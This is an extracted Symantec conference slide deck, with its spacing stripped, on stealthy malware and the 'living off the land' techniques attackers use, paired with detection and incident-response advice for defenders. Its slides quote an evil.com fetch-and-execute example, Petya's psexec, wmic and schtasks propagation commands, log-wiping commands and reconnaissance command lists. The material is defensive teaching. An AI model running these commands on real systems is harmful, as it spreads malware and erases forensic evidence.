Post on 08-Nov-2018
08/05/18
1
BewareoftheNinjas
FelixLeder<Felix_Leder@Symantec.com>
InaNutshell–MaketheInternetasaferplace
• Symantec
– CommercialOrg
– Highqualityproducts
– MalwareAnalysisSystems
– Huuuugelotofdata
– Patents
• TheHoneynetProject
– Non-ProfitOrg
– OpenSource
– CuckooSandbox(2010)
– Sharingwhatwecan
– Publictraining
Copyright©2015SymantecCorporation
2
08/05/18
2
Defender’sView
OldSchool-Prevention
IaskmyselfIFIwillgetbreached.
WhatcanIdotoPREVENTbreaches?
NewSchool-Detection
IaskmyselfWHENIwillgetbreached
WhatcanIdotoDETECTbreaches?
WhatwillIdoinsuchanevent?(DFIRaware)
Copyright©2015SymantecCorporation
3
Attacker’sView
OldSchool–MaliciousSoftware
Mission:Doeverythingtostayundetected
Tactics:
• Obfuscation
• Anti-securitytools
NewSchool-Ninja
Mission:Hideaslongaspossible
Tactics:
• Hideinthenoise
• Stayoutsidemonitoringdomains
• Leaveminimaltraces
Copyright©2015SymantecCorporation
4
Softwaredoesnotbreachorganizations–Peopledo
08/05/18
3
Sometry…
Copyright©2015SymantecCorporation
5
http://www.chinadaily.com.cn/china/2015-04/11/content_20411580.htm#Content
Somedoitbetter
Copyright©2015SymantecCorporation
6
https://www.pinterest.ie/pin/272467846179842314/
08/05/18
4
Somearealmostimpossibletospot
Copyright©2015SymantecCorporation
7
https://www.pinterest.ie/pin/298996862741834388/
SecurityToolAwareness
Copyright©2015SymantecCorporation 8
Ninjasadjust
08/05/18
5
Gozi:UserInteractiontotheNextLevel
• PayloadencryptedwithRANDOMKEY
• Nobodyknowsrandomkey(notevenmalwareitself)
• Idea:Bruteforcekeybasedonmousemove
• Eventuallyarealuserdecryptsthepayload
Copyright©2015SymantecCorporation
9
Decrypt(?)
EncryptedPayload
Key:5ýKey:1ýKey:6ýKey:9ýKey:7þ
AItothemax-GhostUser
Copyright©2015SymantecCorporation
10
08/05/18
6
Leavenotrace
Duqu–2010-2011
Copyright©2015SymantecCorporation
12
08/05/18
7
Example:Duqu2.0
• Infection:– Documents/spearphishing
– Privilegeescalation
– Pass-the-hash
• NoPersistenceonhost
– Taskscheduler
– Remoteexecution
• InMemoryonly(evadingforensics)
• Three0-daysused
• InternalC2forwarding
• Traffichidinginpictures
• Changingencryption
DomainController
Hide
Copyright©2015SymantecCorporation 14
Lookingattheninjainthehost
08/05/18
8
LetWindowsdothedirtywork
• IfWindows/Microsoftistrusted,letitdothedirtywork
Copyright©2015SymantecCorporation
15
Fetchhttp://evil.com/malw.exe
andthenEXECUTEit
OK!
BackgroundIntelligentTransferService/BITS
Copyright©2015SymantecCorporation
16
08/05/18
9
Gowherethere’snomonitoring-WMI
• WindowsManagementInstrumentation
• NosuspiciousAPIs;justaskWindows
Copyright©2015SymantecCorporation
17
Win32_NetworkAdapterConfiguration
Bluwimps-PersistencethroughWMI
Copyright©2015SymantecCorporation
18
08/05/18
10
Poweliks-filelessintheregistry
• FolderopenedinFileopendialog/explorer…
Copyright©2015SymantecCorporation
19
Livingofftheland–InformationGathering
• Manyattackgroupsusecommonsystemtoolsduringtheirattacks
• systeminfo
• netview
• netview/domain
• tasklist/v
• gpresult/z
• arp-a
• netshare
• netuse
• netuseradministrator
• netuser/domain
• netuseradministrator/domain
• tasklist/fi
WATERBUG/TURLA
• hostname
• whoami
• ver
• ipconfig-all
• pingwww.google.com
• queryuser
• netuser
• netview
• netview/domain
• tasklist/svc
• netstat-ano|find\TCP\
• msdtc[IP][port]
APPLEWORM/LAZARUS
• netuser
• ipconfig/all
• netstart
• systeminfo
• gpresult
BILLBUG
08/05/18
11
Dual-UseTools:Petya
Petyausesdual-usetools
• ThreatisDLLexecutedbyrundll32.exe
• UsesrecompiledversionofLSADumpMimikatztogetpasswords
• UsesPsExectopropagate
– \\[server_name]\admin$\perfc.dat
– psexecrundll32.exec:\windows\perfc.dat#1<rand>
• UsesWMItopropagateifPsExecfails
– wmic.exe/node:[IPAddress]/user:[USERNAME]/password:[PASSWORD]processcallcreate“%System%\rundll32.exe\“%Windows%\perfc.dat\"#160”
• ScheduledtasktorestartintothemaliciousMBRpayload
– schtasks/RU"SYSTEM"/Create/SConce/TN""/TR“%system%\shutdown14:42.exe/r/f"/ST
• Deleteslogfilestohidetraces
– wevtutilclSetup&wevtutilclSystem&…&fsutilusndeletejournal/D%C:
08/05/18
12
NotjustWindows
Copyright©2015SymantecCorporation
23
• HiddenLotusonOSXusingshellcommands
Clean Malicious
ForensicsandIncidentManagement
• BackgroundIntelligenceTransferService
• WindowsManagementInstrumentation
• Dualusetools
è Notnecessarilyfilesondisk
è (alotof)Activitiesstarted
è Knowyourenvironmentàspotanomalies
• Powershellonsecretariescomputer?
• WindowsdownloadingupdatesfromRussia,China,orSweden?
• HRdepartmentinvokingnet view /domaincommands
Copyright©2015SymantecCorporation
24
08/05/18
13
HidebehindtheClouds
Copyright©2015SymantecCorporation 25
ShortHistoryofMalwareC2
Copyright©2015SymantecCorporation
08/05/18
14
TwitterBotnetasexample
• Prevention:BlockTwitter?
• IncidentResponse:RetrospectiveTwittertrafficanalysis?
– Signal2noiseratiolow
– TLS–blindspots?
• Endpointmonitoring?
• Encryptedtrafficmgmt.?
• NSSKeyLogFile?
Copyright©2015SymantecCorporation
27
InceptionFramework
• Targetedattack(mostlyRussiantargets)
• Exfiltrateto Cloudprovider
Copyright©2015SymantecCorporation
28
08/05/18
15
FakeUpdatescampaigns
• Useofglobalcloudservices
Copyright©2015SymantecCorporation
29
Canyouruleoutthecloud?
Copyright©2015SymantecCorporation
30
HTTPS/TLS
08/05/18
16
Directcloudtransfers
Findthebreach
• Whatwentwhereandwhen?
• Whatwassharedwithwhom?
• Whattypeoffilesweretransferred?(docsw/act.content,exe,…)
• Whatwasmodifiedbywhom?
• Tracedeletedfiles?
• Scale:1000usersw/1000fileoperationsperday
Copyright©2015SymantecCorporation
31
Cloudforensics
Copyright©2015SymantecCorporation
32
08/05/18
17
ReadyforCloudIR?
• Canyoulookintoencryptedtraffic?(post-breach)
• OverviewoveractivitiesinyourCloudservices?(spotbreaches)
– Whatactionswouldbesuspicious?
– Differentusergroups/differentbehaviors?
• ProceduresforIR?(post-breach)
Copyright©2015SymantecCorporation
33
RunningyourownCloudservice
Copyright©2015SymantecCorporation 34
08/05/18
18
Copyright©2015SymantecCorporation
35
DoNOTask:“IfIwillgetbreached?”
Copyright©2015SymantecCorporation
36
08/05/18
19
DoNOTask:“IfIwillgetbreached?”
Copyright©2015SymantecCorporation
37
and
CloudPets
• SendmessagestoPet
• Petcanrecordmessagesandsendback
• MongoDBwithallaccountspubliclyaccessibleonInternet
– Useraccounts
– Messages
Copyright©2015SymantecCorporation
38
https://www.troyhunt.com/data-from-connected-cloudpets-teddy-bears-leaked-and-ransomed-exposing-kids-voice-messages/
08/05/18
20
CloudPets
• SendmessagestoPet
• Petcanrecordmessagesandsendback
• MongoDBwithallaccountspubliclyaccessibleonInternet
– Useraccounts
– Messages
Copyright©2015SymantecCorporation
39
https://www.troyhunt.com/data-from-connected-cloudpets-teddy-bears-leaked-and-ransomed-exposing-kids-voice-messages/
BecomingmoreIntimate
Copyright©2015SymantecCorporation
40
08/05/18
21
BecomingmoreIntimate
Copyright©2015SymantecCorporation
41
Andmoreintimate…
Copyright©2015SymantecCorporation
42
08/05/18
22
Andmoreintimate…
Copyright©2015SymantecCorporation
43
Ithappenseveryday…
Copyright©2015SymantecCorporation
44
https://cloudpets-prod.s3.am
azonaw
s.com/9...51.wav
08/05/18
23
Incidentprocess
Copyright©2015SymantecCorporation
45
Onprem
Clouduse
Cloudserviceoperation
Onpremise
Clouduse
CloudOp
AvailabilityoftoolsComplexity
Clearboundariesèshortendiscovery
Define“Normality”
• Yes,policiesareapain
• Whatisnormal?Whatisknowtobeoutsidethenorm?
Learn“Normality”
• Everycloudappisdifferent
• Standardbehaviorcanbelearned
Copyright©2015SymantecCorporation
46
08/05/18
24
Example:VirtualPrivateCloud
Copyright©2015SymantecCorporation
47
VPC
Example:Containers
Copyright©2015SymantecCorporation
48
https://wallhere.com/en/wallpaper/600531
08/05/18
25
Example:Container&Microservices
Copyright©2015SymantecCorporation
49
Orca
Gray
Humpback
Blue
Shark
Fin
Minke
Example:Microserviceworkflows
Copyright©2015SymantecCorporation
50
Orca
Gray
Humpback
Blue
Shark
Fin
Minke
08/05/18
26
SecureVMintheCloud(likeon-premise)
Copyright©2015SymantecCorporation
51
HostIDS Whitelist EDR
Themoreyouknow,thefasteryoureact
Copyright©2015SymantecCorporation
52
08/05/18
27
AntiForensics
Copyright©2015SymantecCorporation 53
Smokeloadera.k.a.Dofoil
• ExtendableTrojanKit
• Ring3-rootkit(32-bit)
– Hideprocesses
– Hideregistry
– Hidefiles
• Killsecuritytools
• Injectintoexplorer.exe
Copyright©2015SymantecCorporation
54
Process
BenignCode
Data
MaliciousCode
08/05/18
28
NotjustWindows
Copyright©2015SymantecCorporation
55
• HiddenLotusonOSXwithanti-forensics
Clean Malicious
Getyourfactsstraight
J
08/05/18
29
http://westernriverimages.photoshelter.com/image/I0000.gezYGWvQX4
CyberwarIranianattackonBowmandam,2013
http://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559
http://westernriverimages.photoshelter.com/image/I0000.gezYGWvQX4
CyberwarIranianattackonBowmandam,2013
http://www.wsj.com/articles/iranian-hackers-infiltrated-new-york-dam-in-2013-1450662559
08/05/18
30
Summary
Copyright©2015SymantecCorporation 59
Summary
• Attackerswillalwaysadjust–Ninjashideinthenoise
• Attackerswillalwaysusesystemsinunusualways
• Log&recordthehe**outofyoursystems
– Systemlogs(remote)
– EDR
– Networklogs(thinkencryptedtraffic)
• Define/learnwhatis“normal”
– Users
– Systems
– Architecture
• BethefirsttonoticeàSetupalerting
Copyright©2015SymantecCorporation
60
08/05/18
31
Thankyou!
Copyright©2015SymantecCorporation.Allrightsreserved.SymantecandtheSymantecLogoaretrademarksorregisteredtrademarksofSymantecCorporationoritsaffiliatesintheU.S.andothercountries.Othernamesmaybetrademarksoftheirrespectiveowners.
Thisdocumentisprovidedforinformationalpurposesonlyandisnotintendedasadvertising.Allwarrantiesrelatingtotheinformationinthisdocument,eitherexpressorimplied,aredisclaimedtothemaximumextentallowedbylaw.Theinformationinthisdocumentissubjecttochangewithoutnotice.
Felix_Leder@Symantec.com